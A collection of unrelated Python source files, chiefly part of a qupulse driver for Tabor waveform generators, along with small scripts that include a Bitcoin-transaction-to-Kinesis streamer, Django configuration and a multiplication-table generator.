if name in self._channel_tuple._known_programs:
if force:
self._channel_tuple.free_program(name)
else:
raise ValueError('{} is already known on {}'.format(name, self._channel_tuple.idn))
# They call the peak to peak range amplitude
ranges = tuple(ch[VoltageRange].amplitude for ch in self._channel_tuple.channels)
voltage_amplitudes = tuple(range / 2 for range in ranges)
voltage_offsets = []
for channel in self._channel_tuple.channels:
if channel._amplitude_offset_handling == AmplitudeOffsetHandling.IGNORE_OFFSET:
voltage_offsets.append(0)
elif channel._amplitude_offset_handling == AmplitudeOffsetHandling.CONSIDER_OFFSET:
voltage_offsets.append(channel[VoltageRange].offset)
else:
raise NotImplementedError(
'{} is invalid as AWGAmplitudeOffsetHandling'.format(channel._amplitude_offset_handling))
voltage_offsets = tuple(voltage_offsets)
# parse to tabor program
tabor_program = TaborProgram(program,
channels=tuple(channels),
markers=marker_channels,
device_properties=self._channel_tuple.device.dev_properties,
sample_rate=sample_rate / 10 ** 9,
amplitudes=voltage_amplitudes,
offsets=voltage_offsets,
voltage_transformations=voltage_transformation)
segments, segment_lengths = tabor_program.get_sampled_segments()
waveform_to_segment, to_amend, to_insert = self._channel_tuple._find_place_for_segments_in_memory(segments,
segment_lengths)
self._channel_tuple._segment_references[waveform_to_segment[waveform_to_segment >= 0]] += 1
for wf_index in np.flatnonzero(to_insert > 0):
segment_index = to_insert[wf_index]
self._channel_tuple._upload_segment(to_insert[wf_index], segments[wf_index])
waveform_to_segment[wf_index] = segment_index
if np.any(to_amend):
segments_to_amend = [segments[idx] for idx in np.flatnonzero(to_amend)]
waveform_to_segment[to_amend] = self._channel_tuple._amend_segments(segments_to_amend)
self._channel_tuple._known_programs[name] = TaborProgramMemory(waveform_to_segment=waveform_to_segment,
program=tabor_program)
# set the default repetionmode for a programm
self.set_repetition_mode(program_name=name, repetition_mode=repetition_mode)
def remove(self, name: str) -> None:
"""
Remove a program from the AWG.
Also discards all waveforms referenced only by the program identified by name.
Args:
name (str): The name of the program to remove.
"""
self._channel_tuple.free_program(name)
self._channel_tuple.cleanup()
def clear(self) -> None:
"""
Removes all programs and waveforms from the AWG.
Caution: This affects all programs and waveforms on the AWG, not only those uploaded using qupulse!
"""
self._channel_tuple.device.channels[0]._select()
self._channel_tuple.device[SCPI].send_cmd(":TRAC:DEL:ALL")
self._channel_tuple.device[SCPI].send_cmd(":SOUR:SEQ:DEL:ALL")
self._channel_tuple.device[SCPI].send_cmd(":ASEQ:DEL")
self._channel_tuple.device[SCPI].send_cmd(":TRAC:DEF 1, 192")
self._channel_tuple.device[SCPI].send_cmd(":TRAC:SEL 1")
self._channel_tuple.device[SCPI].send_cmd(":TRAC:MODE COMB")
self._channel_tuple.device._send_binary_data(bin_dat=self._channel_tuple._idle_segment.get_as_binary())
self._channel_tuple._segment_lengths = 192 * np.ones(1, dtype=np.uint32)
self._channel_tuple._segment_capacity = 192 * np.ones(1, dtype=np.uint32)
self._channel_tuple._segment_hashes = np.ones(1, dtype=np.int64) * hash(self._channel_tuple._idle_segment)
self._channel_tuple._segment_references = np.ones(1, dtype=np.uint32)
self._channel_tuple._advanced_sequence_table = []
self._channel_tuple._sequencer_tables = []
self._channel_tuple._known_programs = dict()
self._change_armed_program(None)
@with_select
def arm(self, name: Optional[str]) -> None:
"""
Load the program 'name' and arm the device for running it.
Args:
name (str): the program the device should change to
"""
if self._channel_tuple._current_program == name:
self._channel_tuple.device[SCPI].send_cmd("SEQ:SEL 1")
else:
self._change_armed_program(name)
@property
def programs(self) -> Set[str]:
"""The set of program names that can currently be executed on the hardware AWG."""
return set(program.name for program in self._channel_tuple._known_programs.keys())
@with_select
def run_current_program(self) -> None:
"""
This method starts running the active program
Throws:
RuntimeError: This exception is thrown if there is no active program for this device
"""
if (self._channel_tuple.device._is_coupled()):
# channel tuple is the first channel tuple
if (self._channel_tuple.device._channel_tuples[0] == self):
if self._channel_tuple._current_program:
repetition_mode = self._channel_tuple._known_programs[
self._channel_tuple._current_program].program._repetition_mode
if repetition_mode == "infinite":
self._cont_repetition_mode()
self._channel_tuple.device[SCPI].send_cmd(':TRIG',
paranoia_level=self._channel_tuple.internal_paranoia_level)
else:
raise ValueError("{} is no vaild repetition mode".format(repetition_mode))
else:
raise RuntimeError("No program active")
else:
warnings.warn(
"TaborWarning - run_current_program() - the device is coupled - runthe program via the first channel tuple")
else:
if self._channel_tuple._current_program:
repetition_mode = self._channel_tuple._known_programs[
self._channel_tuple._current_program].program._repetition_mode
if repetition_mode == "infinite":
self._cont_repetition_mode()
self._channel_tuple.device[SCPI].send_cmd(':TRIG', paranoia_level=self._channel_tuple.internal_paranoia_level)
else:
raise ValueError("{} is no vaild repetition mode".format(repetition_mode))
else:
raise RuntimeError("No program active")
@with_select
@with_configuration_guard
def _change_armed_program(self, name: Optional[str]) -> None:
"""The armed program of the channel tuple is changed to the program with the name 'name'"""
if name is None:
sequencer_tables = [self._idle_sequence_table]
advanced_sequencer_table = [(1, 1, 0)]
else:
waveform_to_segment_index, program = self._channel_tuple._known_programs[name]
waveform_to_segment_number = waveform_to_segment_index + 1
# translate waveform number to actual segment
sequencer_tables = [[(rep_count, waveform_to_segment_number[wf_index], jump_flag)
for ((rep_count, wf_index, jump_flag), _) in sequencer_table]
for sequencer_table in program.get_sequencer_tables()]
# insert idle sequence
sequencer_tables = [self._idle_sequence_table] + sequencer_tables
# adjust advanced sequence table entries by idle sequence table offset
advanced_sequencer_table = [(rep_count, seq_no + 1, jump_flag)
for rep_count, seq_no, jump_flag in program.get_advanced_sequencer_table()]
if program.waveform_mode == TaborSequencing.SINGLE:
assert len(advanced_sequencer_table) == 1
assert len(sequencer_tables) == 2
while len(sequencer_tables[1]) < self._channel_tuple.device.dev_properties["min_seq_len"]:
assert advanced_sequencer_table[0][0] == 1
sequencer_tables[1].append((1, 1, 0))
# insert idle sequence in advanced sequence table
advanced_sequencer_table = [(1, 1, 0)] + advanced_sequencer_table
while len(advanced_sequencer_table) < self._channel_tuple.device.dev_properties["min_aseq_len"]:
advanced_sequencer_table.append((1, 1, 0))
self._channel_tuple.device[SCPI].send_cmd("SEQ:DEL:ALL", paranoia_level=self._channel_tuple.internal_paranoia_level)
self._channel_tuple._sequencer_tables = []
self._channel_tuple.device[SCPI].send_cmd("ASEQ:DEL", paranoia_level=self._channel_tuple.internal_paranoia_level)
self._channel_tuple._advanced_sequence_table = []
# download all sequence tables
for i, sequencer_table in enumerate(sequencer_tables):
self._channel_tuple.device[SCPI].send_cmd("SEQ:SEL {}".format(i + 1),
paranoia_level=self._channel_tuple.internal_paranoia_level)
self._channel_tuple.device._download_sequencer_table(sequencer_table)
self._channel_tuple._sequencer_tables = sequencer_tables
self._channel_tuple.device[SCPI].send_cmd("SEQ:SEL 1", paranoia_level=self._channel_tuple.internal_paranoia_level)
self._channel_tuple.device._download_adv_seq_table(advanced_sequencer_table)
self._channel_tuple._advanced_sequence_table = advanced_sequencer_table
self._channel_tuple._current_program = name
def _select(self):
self._channel_tuple.channels[0]._select()
@property
def _configuration_guard_count(self):
return self._channel_tuple._configuration_guard_count
@_configuration_guard_count.setter
def _configuration_guard_count(self, configuration_guard_count):
self._channel_tuple._configuration_guard_count = configuration_guard_count
def _enter_config_mode(self):
self._channel_tuple._enter_config_mode()
def _exit_config_mode(self):
self._channel_tuple._exit_config_mode()
@with_select
def _cont_repetition_mode(self):
"""Changes the run mode of this channel tuple to continous mode"""
self._channel_tuple.device[SCPI].send_cmd(f":TRIG:SOUR:ADV EXT")
self._channel_tuple.device[SCPI].send_cmd(
f":INIT:GATE OFF; :INIT:CONT ON; :INIT:CONT:ENAB ARM; :INIT:CONT:ENAB:SOUR {self._trigger_source}")
class TaborVolatileParameters(VolatileParameters):
def __init__(self, channel_tuple: "TaborChannelTuple", ):
super().__init__(channel_tuple=channel_tuple)
def set_volatile_parameters(self, program_name: str, parameters: Mapping[str, numbers.Number]) -> None:
""" Set the values of parameters which were marked as volatile on program creation. Sets volatile parameters
in program memory and device's (adv.) sequence tables if program is current program.
If set_volatile_parameters needs to run faster, set CONFIG_MODE_PARANOIA_LEVEL to 0 which causes the device to
enter the configuration mode with paranoia level 0 (Note: paranoia level 0 does not work for the simulator)
and set device._is_coupled.
Args:
program_name: Name of program which should be changed.
parameters: Names of volatile parameters and respective values to which they should be set.
"""
waveform_to_segment_index, program = self._channel_tuple._known_programs[program_name]
modifications = program.update_volatile_parameters(parameters)
self._channel_tuple.logger.debug("parameter modifications: %r" % modifications)
if not modifications:
self._channel_tuple.logger.info(
"There are no volatile parameters to update. Either there are no volatile parameters with "
"these names,\nthe respective repetition counts already have the given values or the "
"volatile parameters were dropped during upload.")
return
if program_name == self._channel_tuple._current_program:
commands = []
for position, entry in modifications.items():
if not entry.repetition_count > 0:
raise ValueError("Repetition must be > 0")
if isinstance(position, int):
commands.append(":ASEQ:DEF {},{},{},{}".format(position + 1, entry.element_number + 1,
entry.repetition_count, entry.jump_flag))
else:
table_num, step_num = position
commands.append(":SEQ:SEL {}".format(table_num + 2))
commands.append(":SEQ:DEF {},{},{},{}".format(step_num,
waveform_to_segment_index[entry.element_id] + 1,
entry.repetition_count, entry.jump_flag))
self._channel_tuple._execute_multiple_commands_with_config_guard(commands)
# Wait until AWG is finished
_ = self._channel_tuple.device.main_instrument._visa_inst.query("*OPC?")
class TaborReadProgram(ReadProgram):
def __init__(self, channel_tuple: "TaborChannelTuple", ):
super().__init__(channel_tuple=channel_tuple)
def read_complete_program(self):
return PlottableProgram.from_read_data(self._channel_tuple.read_waveforms(),
self._channel_tuple.read_sequence_tables(),
self._channel_tuple.read_advanced_sequencer_table())
# Implementation
class TaborChannelTuple(AWGChannelTuple):
CONFIG_MODE_PARANOIA_LEVEL = None
def __init__(self, idn: int, device: TaborDevice, channels: Iterable["TaborChannel"],
marker_channels: Iterable["TaborMarkerChannel"]):
super().__init__(idn)
self._device = weakref.ref(device)
self._configuration_guard_count = 0
self._is_in_config_mode = False
self._channels = tuple(channels)
self._marker_channels = tuple(marker_channels)
# the channel and channel marker are assigned to this channel tuple
for channel in self.channels:
channel._set_channel_tuple(self)
for marker_ch in self.marker_channels:
marker_ch._set_channel_tuple(self)
# adding Features
self.add_feature(TaborProgramManagement(self))
self.add_feature(TaborVolatileParameters(self))
self._idle_segment = TaborSegment.from_sampled(voltage_to_uint16(voltage=np.zeros(192),
output_amplitude=0.5,
output_offset=0., resolution=14),
voltage_to_uint16(voltage=np.zeros(192),
output_amplitude=0.5,
output_offset=0., resolution=14),
None, None)
self._known_programs = dict() # type: Dict[str, TaborProgramMemory]
self._current_program = None
self._segment_lengths = None
self._segment_capacity = None
self._segment_hashes = None
self._segment_references = None
self._sequencer_tables = None
self._advanced_sequence_table = None
self._internal_paranoia_level = 0
self[TaborProgramManagement].clear()
self._channel_tuple_adapter: ChannelTupleAdapter
@property
def internal_paranoia_level(self) -> Optional[int]:
return self._internal_paranoia_level
@property
def logger(self):
return logging.getLogger("qupulse.tabor")
@property
def channel_tuple_adapter(self) -> ChannelTupleAdapter:
if self._channel_tuple_adapter is None:
self._channel_tuple_adapter = ChannelTupleAdapter(self)
return self._channel_tuple_adapter
def _select(self) -> None:
"""The channel tuple is selected, which means that the first channel of the channel tuple is selected"""
self.channels[0]._select()
@property
def device(self) -> TaborDevice:
"""Returns the device that the channel tuple belongs to"""
return self._device()
@property
def channels(self) -> Collection["TaborChannel"]:
"""Returns all channels of the channel tuple"""
return self._channels
@property
def marker_channels(self) -> Collection["TaborMarkerChannel"]:
"""Returns all marker channels of the channel tuple"""
return self._marker_channels
@property
@with_select
def sample_rate(self) -> TimeType:
"""Returns the sample rate that the channels of a channel tuple have"""
return TimeType.from_float(
float(self.device[SCPI].send_query(":FREQ:RAST?".format(channel=self.channels[0].idn))))
@property
def total_capacity(self) -> int:
return int(self.device.dev_properties["max_arb_mem"]) // 2
def free_program(self, name: str) -> TaborProgramMemory:
if name is None:
raise TaborException("Removing 'None' program is forbidden.")
program = self._known_programs.pop(name)
self._segment_references[program.waveform_to_segment] -= 1
if self._current_program == name:
self[TaborProgramManagement]._change_armed_program(None)
return program
@property
def _segment_reserved(self) -> np.ndarray:
return self._segment_references > 0
@property
def _free_points_in_total(self) -> int:
return self.total_capacity - np.sum(self._segment_capacity[self._segment_reserved])
@property
def _free_points_at_end(self) -> int:
reserved_index = np.flatnonzero(self._segment_reserved)
if len(reserved_index):
return self.total_capacity - np.sum(self._segment_capacity[:reserved_index[-1]])
else:
return self.total_capacity
@with_select
def read_waveforms(self) -> List[np.ndarray]:
device = self.device._get_readable_device(simulator=True)
old_segment = device.send_query(":TRAC:SEL?")
waveforms = []
uploaded_waveform_indices = np.flatnonzero(
self._segment_references) + 1
for segment in uploaded_waveform_indices:
device.send_cmd(":TRAC:SEL {}".format(segment), paranoia_level=self.internal_paranoia_level)
waveforms.append(device.read_segment_data())
device.send_cmd(":TRAC:SEL {}".format(old_segment), paranoia_level=self.internal_paranoia_level)
return waveforms
@with_select
def read_sequence_tables(self) -> List[Tuple[np.ndarray, np.ndarray, np.ndarray]]:
device = self.device._get_readable_device(simulator=True)
old_sequence = device.send_query(":SEQ:SEL?")
sequences = []
uploaded_sequence_indices = np.arange(len(self._sequencer_tables)) + 1
for sequence in uploaded_sequence_indices:
device.send_cmd(":SEQ:SEL {}".format(sequence), paranoia_level=self.internal_paranoia_level)
table = device.read_sequencer_table()
sequences.append((table['repeats'], table['segment_no'], table['jump_flag']))
device.send_cmd(":SEQ:SEL {}".format(old_sequence), paranoia_level=self.internal_paranoia_level)
return sequences
@with_select
def read_advanced_sequencer_table(self) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
table = self.device._get_readable_device(simulator=True).read_advanced_sequencer_table()
return table['repeats'], table['segment_no'], table['jump_flag']
def read_complete_program(self) -> PlottableProgram:
return PlottableProgram.from_read_data(self.read_waveforms(),
self.read_sequence_tables(),
self.read_advanced_sequencer_table())
def _find_place_for_segments_in_memory(self, segments: Sequence, segment_lengths: np.ndarray) -> \
Tuple[np.ndarray, np.ndarray, np.ndarray]:
# TODO: comment was not finished
"""
1. Find known segments
2. Find empty spaces with fitting length
3. Find empty spaces with bigger length
4. Amend remaining segments
Args:
segments (Sequence):
segment_length (Sequence):
Returns:
"""
segment_hashes = np.fromiter((hash(segment) for segment in segments), count=len(segments), dtype=np.int64)
waveform_to_segment = find_positions(self._segment_hashes, segment_hashes)
# separate into known and unknown
unknown = (waveform_to_segment == -1)
known = ~unknown
known_pos_in_memory = waveform_to_segment[known]
assert len(known_pos_in_memory) == 0 or np.all(
self._segment_hashes[known_pos_in_memory] == segment_hashes[known])
new_reference_counter = self._segment_references.copy()
new_reference_counter[known_pos_in_memory] += 1
to_upload_size = np.sum(segment_lengths[unknown] + 16)
free_points_in_total = self.total_capacity - np.sum(self._segment_capacity[self._segment_references > 0])
if free_points_in_total < to_upload_size:
raise MemoryError("Not enough free memory",
free_points_in_total,
to_upload_size,
self._free_points_in_total)
to_amend = cast(np.ndarray, unknown)
to_insert = np.full(len(segments), fill_value=-1, dtype=np.int64)
reserved_indices = np.flatnonzero(new_reference_counter > 0)
first_free = reserved_indices[-1] + 1 if len(reserved_indices) else 0
free_segments = new_reference_counter[:first_free] == 0
free_segment_count = np.sum(free_segments)
# look for a free segment place with the same length
for segment_idx in np.flatnonzero(to_amend):
if free_segment_count == 0:
break
pos_of_same_length = np.logical_and(free_segments,
segment_lengths[segment_idx] == self._segment_capacity[:first_free])
idx_same_length = np.argmax(pos_of_same_length)
if pos_of_same_length[idx_same_length]:
free_segments[idx_same_length] = False
free_segment_count -= 1
to_amend[segment_idx] = False
to_insert[segment_idx] = idx_same_length
# try to find places that are larger than the segments to fit in starting with the large segments and large
# free spaces
segment_indices = np.flatnonzero(to_amend)[np.argsort(segment_lengths[to_amend])[::-1]]
capacities = self._segment_capacity[:first_free]
for segment_idx in segment_indices:
free_capacities = capacities[free_segments]
free_segments_indices = np.flatnonzero(free_segments)[np.argsort(free_capacities)[::-1]]
if len(free_segments_indices) == 0:
break
fitting_segment = np.argmax((free_capacities >= segment_lengths[segment_idx])[::-1])
fitting_segment = free_segments_indices[fitting_segment]
if self._segment_capacity[fitting_segment] >= segment_lengths[segment_idx]:
free_segments[fitting_segment] = False
to_amend[segment_idx] = False
to_insert[segment_idx] = fitting_segment
free_points_at_end = self.total_capacity - np.sum(self._segment_capacity[:first_free])
if np.sum(segment_lengths[to_amend] + 16) > free_points_at_end:
raise MemoryError("Fragmentation does not allow upload.",
np.sum(segment_lengths[to_amend] + 16),
free_points_at_end,
self._free_points_at_end)
return waveform_to_segment, to_amend, to_insert
@with_select
@with_configuration_guard
def _upload_segment(self, segment_index: int, segment: TaborSegment) -> None:
if self._segment_references[segment_index] > 0:
raise ValueError("Reference count not zero")
if segment.num_points > self._segment_capacity[segment_index]:
raise ValueError("Cannot upload segment here.")
segment_no = segment_index + 1
self.device[TaborSCPI].send_cmd(":TRAC:DEF {}, {}".format(segment_no, segment.num_points),
paranoia_level=self.internal_paranoia_level)
self._segment_lengths[segment_index] = segment.num_points
self.device[TaborSCPI].send_cmd(":TRAC:SEL {}".format(segment_no),
paranoia_level=self.internal_paranoia_level)
self.device[TaborSCPI].send_cmd(":TRAC:MODE COMB",
paranoia_level=self.internal_paranoia_level)
wf_data = segment.get_as_binary()
self.device._send_binary_data(bin_dat=wf_data)
self._segment_references[segment_index] = 1
self._segment_hashes[segment_index] = hash(segment)
@with_select
@with_configuration_guard
def _amend_segments(self, segments: List[TaborSegment]) -> np.ndarray:
new_lengths = np.asarray([s.num_points for s in segments], dtype=np.uint32)
wf_data = make_combined_wave(segments)
trac_len = len(wf_data) // 2
segment_index = len(self._segment_capacity)
first_segment_number = segment_index + 1
self.device[TaborSCPI].send_cmd(":TRAC:DEF {},{}".format(first_segment_number, trac_len),
paranoia_level=self.internal_paranoia_level)
self.device[TaborSCPI].send_cmd(":TRAC:SEL {}".format(first_segment_number),
paranoia_level=self.internal_paranoia_level)
self.device[TaborSCPI].send_cmd(":TRAC:MODE COMB",
paranoia_level=self.internal_paranoia_level)
self.device._send_binary_data(bin_dat=wf_data)
old_to_update = np.count_nonzero(self._segment_capacity != self._segment_lengths)
segment_capacity = np.concatenate((self._segment_capacity, new_lengths))
segment_lengths = np.concatenate((self._segment_lengths, new_lengths))
segment_references = np.concatenate((self._segment_references, np.ones(len(segments), dtype=int)))
segment_hashes = np.concatenate((self._segment_hashes, [hash(s) for s in segments]))
if len(segments) < old_to_update:
for i, segment in enumerate(segments):
current_segment_number = first_segment_number + i
self.device[TaborSCPI].send_cmd(":TRAC:DEF {},{}".format(current_segment_number, segment.num_points),
paranoia_level=self.internal_paranoia_level)
else:
# flush the capacity
self.device._download_segment_lengths(segment_capacity)
# update non fitting lengths
for i in np.flatnonzero(segment_capacity != segment_lengths):
self.device[SCPI].send_cmd(":TRAC:DEF {},{}".format(i + 1, segment_lengths[i]))
self._segment_capacity = segment_capacity
self._segment_lengths = segment_lengths
self._segment_hashes = segment_hashes
self._segment_references = segment_references
return segment_index + np.arange(len(segments), dtype=np.int64)
@with_select
@with_configuration_guard
def cleanup(self) -> None:
"""Discard all segments after the last which is still referenced"""
reserved_indices = np.flatnonzero(self._segment_references > 0)
old_end = len(self._segment_lengths)
new_end = reserved_indices[-1] + 1 if len(reserved_indices) else 0
self._segment_lengths = self._segment_lengths[:new_end]
self._segment_capacity = self._segment_capacity[:new_end]
self._segment_hashes = self._segment_hashes[:new_end]
self._segment_references = self._segment_references[:new_end]
try:
# send max 10 commands at once
chunk_size = 10
for chunk_start in range(new_end, old_end, chunk_size):
self.device[SCPI].send_cmd("; ".join("TRAC:DEL {}".format(i + 1)
for i in range(chunk_start, min(chunk_start + chunk_size, old_end))))
except Exception as e:
raise TaborUndefinedState("Error during cleanup. Device is in undefined state.", device=self) from e
@with_configuration_guard
def _execute_multiple_commands_with_config_guard(self, commands: List[str]) -> None:
""" Joins the given commands into one and executes it with configuration guard.
Args:
commands: Commands that should be executed.
"""
cmd_str = ";".join(commands)
self.device[TaborSCPI].send_cmd(cmd_str, paranoia_level=self.internal_paranoia_level)
def _enter_config_mode(self) -> None:
"""
Enter the configuration mode if not already in. All outputs are set to the DC offset of the device and the
sequencing is disabled. The manual states this speeds up sequence validation when uploading multiple sequences.
When entering and leaving the configuration mode the AWG outputs a small (~60 mV in 4 V mode) blip.
"""
if self._is_in_config_mode is False:
# 1. Selct channel pair
# 2. Select DC as function shape
# 3. Select build-in waveform mode
if self.device._is_coupled():
out_cmd = ":OUTP:ALL OFF"
else:
out_cmd = ""
for channel in self.channels:
out_cmd = out_cmd + ":INST:SEL {ch_id}; :OUTP OFF;".format(ch_id=channel.idn)
marker_0_cmd = ":SOUR:MARK:SEL 1;:SOUR:MARK:SOUR USER;:SOUR:MARK:STAT OFF"
marker_1_cmd = ":SOUR:MARK:SEL 2;:SOUR:MARK:SOUR USER;:SOUR:MARK:STAT OFF"
wf_mode_cmd = ":SOUR:FUNC:MODE FIX"
cmd = ";".join([marker_0_cmd, marker_1_cmd, wf_mode_cmd])
cmd = out_cmd + cmd
self.device[TaborSCPI].send_cmd(cmd, paranoia_level=self.CONFIG_MODE_PARANOIA_LEVEL)
self._is_in_config_mode = True
@with_select
def _exit_config_mode(self) -> None:
"""Leave the configuration mode. Enter advanced sequence mode and turn on all outputs"""
if self.device._is_coupled():
# Coupled -> switch all channels at once
other_channel_tuple: TaborChannelTuple
if self.channels == self.device.channel_tuples[0].channels:
other_channel_tuple = self.device.channel_tuples[1]
else:
other_channel_tuple = self.device.channel_tuples[0]
if not other_channel_tuple._is_in_config_mode:
self.device[SCPI].send_cmd(":SOUR:FUNC:MODE ASEQ")
self.device[SCPI].send_cmd(":SEQ:SEL 1")
self.device[SCPI].send_cmd(":OUTP:ALL ON")
else:
self.device[SCPI].send_cmd(":SOUR:FUNC:MODE ASEQ")
self.device[SCPI].send_cmd(":SEQ:SEL 1")
for channel in self.channels:
channel[ActivatableChannels].enable()
for marker_ch in self.marker_channels:
marker_ch[ActivatableChannels].enable()
self._is_in_config_mode = False
########################################################################################################################
# Marker Channel
########################################################################################################################
# Features
class TaborActivatableMarkerChannels(ActivatableChannels):
def __init__(self, marker_channel: "TaborMarkerChannel"):
super().__init__()
self._parent = weakref.ref(marker_channel)
@property
def enabled(self) -> bool:
"""
Returns the the state a marker channel has at the moment. A channel is either activated or deactivated
True stands for activated and false for deactivated
"""
return self._parent().device[SCPI].send_query(":MARK:STAT ?") == "ON"
@with_select
def enable(self):
"""Enables the output of a certain marker channel"""
command_string = "SOUR:MARK:SOUR USER; :SOUR:MARK:STAT ON"
command_string = command_string.format(
channel=self._parent().channel_tuple.channels[0].idn,
marker=self._parent().channel_tuple.marker_channels.index(self._parent()) + 1)
self._parent().device[SCPI].send_cmd(command_string)
@with_select
def disable(self):
"""Disable the output of a certain marker channel"""
command_string = ":SOUR:MARK:SOUR USER; :SOUR:MARK:STAT OFF"
command_string = command_string.format(
channel=self._parent().channel_tuple.channels[0].idn,
marker=self._parent().channel_tuple.marker_channels.index(self._parent()) + 1)
self._parent().device[SCPI].send_cmd(command_string)
def _select(self) -> None:
self._parent()._select()
# Implementation
class TaborMarkerChannel(AWGMarkerChannel):
def __init__(self, idn: int, device: TaborDevice):
super().__init__(idn)
self._device = weakref.ref(device)
# adding Features
self.add_feature(TaborActivatableMarkerChannels(self))
@property
def device(self) -> TaborDevice:
"""Returns the device that this marker channel belongs to"""
return self._device()
@property
def channel_tuple(self) -> TaborChannelTuple:
"""Returns the channel tuple that this marker channel belongs to"""
return self._channel_tuple()
def _set_channel_tuple(self, channel_tuple: TaborChannelTuple) -> None:
"""
The channel tuple 'channel_tuple' is assigned to this marker channel
Args:
channel_tuple (TaborChannelTuple): the channel tuple that this marker channel belongs to
"""
self._channel_tuple = weakref.ref(channel_tuple)
def _select(self) -> None:
"""
This marker channel is selected and is now the active channel marker of the device
"""
self.device.channels[int((self.idn - 1) / 2)]._select()
self.device[SCPI].send_cmd(":SOUR:MARK:SEL {marker}".format(marker=(((self.idn - 1) % 2) + 1)))
class TaborUndefinedState(TaborException):
"""
If this exception is raised the attached tabor device is in an undefined state.
It is highly recommended to call reset it.f
"""
def __init__(self, *args, device: Union[TaborDevice, TaborChannelTuple]):
super().__init__(*args)
self.device = device
def reset_device(self):
if isinstance(self.device, TaborDevice):
self.device[TaborDeviceControl].reset()
elif isinstance(self.device, TaborChannelTuple):
self.device.cleanup()
self.device[TaborProgramManagement].clear()
|
from plustutocenter.controller.concretecontroller import ConcreteController
from plustutocenter.qt.view_qt import ViewQt
controller = ConcreteController()
controller.setView(ViewQt(controller))
controller.startApp()
|
ls = []
for i in range(10_000_000):
ls.append(i)
|
import pkg_resources
try:
__version__ = pkg_resources.get_distribution(__name__).version
except pkg_resources.DistributionNotFound:
__version__ = 'unknown'
import logging
logging.addLevelName(5, "TRACE")
logging.TRACE = 5
logging.Logger.trace = lambda self, msg, *args, **kwargs: \
self.log(logging.TRACE, msg, *args, **kwargs)
|
from __future__ import absolute_import
import argparse
from datetime import datetime
import logging
import Queue
import sys
import time
import threading
import uuid
import boto3
import msgpack
import strongfellowbtc.constants as constants
import strongfellowbtc.hex
from strongfellowbtc.protocol import ds256
import strongfellowbtc.zmq
from strongfellowbtc.logging import configure_logging
def k(region):
return boto3.client('kinesis', region_name=region)
def _stream_name(region, env):
return 'transactions-{region}-{env}'.format(region=region, env=env)
def little_endian_long(n):
bs = bytearray(8)
i = 0
while n != 0:
bs[i] = n & 0xff
n = (n >> 8)
i += 1
return bytes(bs)
def create_stream(args=None):
configure_logging()
if args is None:
args = sys.argv[1:]
parser = argparse.ArgumentParser()
parser.add_argument('--region', required=True)
parser.add_argument('--env', required=True)
parser.add_argument('--host', required=True)
parser.add_argument('--shard-count', default='1', type=int)
params = parser.parse_args(args)
kinesis = k(params.region)
stream_name = _stream_name(region=params.region, env=params.env)
shard_count = params.shard_count
logging.info('creating stream %s with shard count %d', stream_name, shard_count)
response = kinesis.create_stream(
StreamName=stream_name,
ShardCount=shard_count
)
logging.info('success: created stream %s with shard count %d', stream_name, shard_count)
def stream_incoming_transactions(args=None):
configure_logging()
if args is None:
args = sys.argv[1:]
parser = argparse.ArgumentParser()
parser.add_argument('--maxsize', type=int, default='300')
parser.add_argument('--txport', type=int, default=str(constants.RAW_TX_PORT))
parser.add_argument('--region', required=True)
parser.add_argument('--env', required=True)
parser.add_argument('--host', required=True)
parser.add_argument('--network', default='main', choices=constants.NETWORKS.keys())
args = parser.parse_args(args)
q = Queue.Queue(maxsize=args.maxsize)
def produce(q):
with strongfellowbtc.zmq.socket(port=args.txport, topic='rawtx') as socket:
while True:
topic, tx = socket.recv_multipart()
delta = datetime.now() - datetime(1970, 1, 1)
ms = long(delta.total_seconds() * 1000)
try:
q.put_nowait((ms, tx))
except Queue.Full:
logging.exception('Queue is Full: we cant put %s' % strongfellowbtc.hex.little_endian_hex(ds256(tx)))
def consume(q):
kinesis = k(region=args.region)
stream_name = _stream_name(region=args.region, env=args.env)
while True:
if q.empty():
time.sleep(1)
logging.info('no transactions, sleeping for a second')
else:
records = []
n = q.qsize()
logging.info('%d transactions equeued', n)
while len(records) < n:
ms, tx = q.get_nowait()
data = msgpack.packb({
't': ms, # milliseconds since epoch
'x': tx, # the transaction
'h': args.host, # short name of the host
'n': args.network # main, testnet, segnet, etc.
})
partition_key = strongfellowbtc.hex.big_endian_hex(ds256(tx))
record = {
'Data': data,
'PartitionKey': partition_key
}
records.append(record)
try:
response = kinesis.put_records(
Records=records,
StreamName=stream_name
)
logging.info('response was: %s', response)
logging.info('SUCCESS putting records')
except:
logging.exception('problem putting records')
time.sleep(3)
t1 = threading.Thread(target=produce, args=(q,))
t2 = threading.Thread(target=consume, args=(q,))
t1.start()
t2.start()
logging.info('join us, wont you?')
t1.join()
t2.join()
def test_get_records(args = None):
configure_logging()
if args is None:
args = sys.argv[1:]
parser = argparse.ArgumentParser()
parser.add_argument('--region', required=True)
parser.add_argument('--env', required=True)
parser.add_argument('--host', required=True)
params = parser.parse_args(args)
kinesis = k(region=params.region)
stream_name = _stream_name(region=params.region, env=params.env)
shard_id = 'shardId-000000000000'
shard_iterator = kinesis.get_shard_iterator(StreamName=stream_name, ShardId=shard_id, ShardIteratorType="LATEST")['ShardIterator']
while True:
response = kinesis.get_records(ShardIterator=shard_iterator, Limit=1000)
shard_iterator = response['NextShardIterator']
for record in response['Records']:
d = msgpack.unpackb(record['Data'])
for key in d:
print 'key: %s' % key
print strongfellowbtc.hex.big_endian_hex(ds256(d['x']))
print response
time.sleep(1)
|
# -*- coding: utf-8
from django.apps import AppConfig
class PublishableModelConfig(AppConfig):
name = 'publishable_model'
|
"""
Funtion Generates the mutiplication tables
"""
def multiplication_tables_generator(times: int, min: int, max: int) -> list:
"""
>>> multiplication_tables_generator(2, 1, 10)
['1 x 2 = 2', '2 x 2 = 4', '3 x 2 = 6', '4 x 2 = 8', '5 x 2 = 10', '6 x 2 = 12', '7 x 2 = 14', '8 x 2 = 16', '9 x 2 = 18', '10 x 2 = 20']
"""
tables = []
for number in range(min, max + 1):
tables.append(f"{number} x {times} = {number * times}")
return tables
if __name__ == "__main__":
import doctest
doctest.testmod()
table = int(input("Enter the Table Number: "))
miny = int(input("Enter the Minimum Valve: "))
maxy = int(input("Enter the Maximum Valve: "))
for table in multiplication_tables_generator(table, miny, maxy):
print(table)
|
from datetime import date
from django.contrib.auth.models import User, AbstractUser, UserManager
from django.db import models
from django.utils.translation import gettext_lazy as _
from .validators import validate_born_date
class CustomUserManager(UserManager):
def create_superuser(self, username, email, password, **extra_fields):
extra_fields.setdefault('occupation', 'ADMIN')
if extra_fields.get('occupation') is not 'ADMIN':
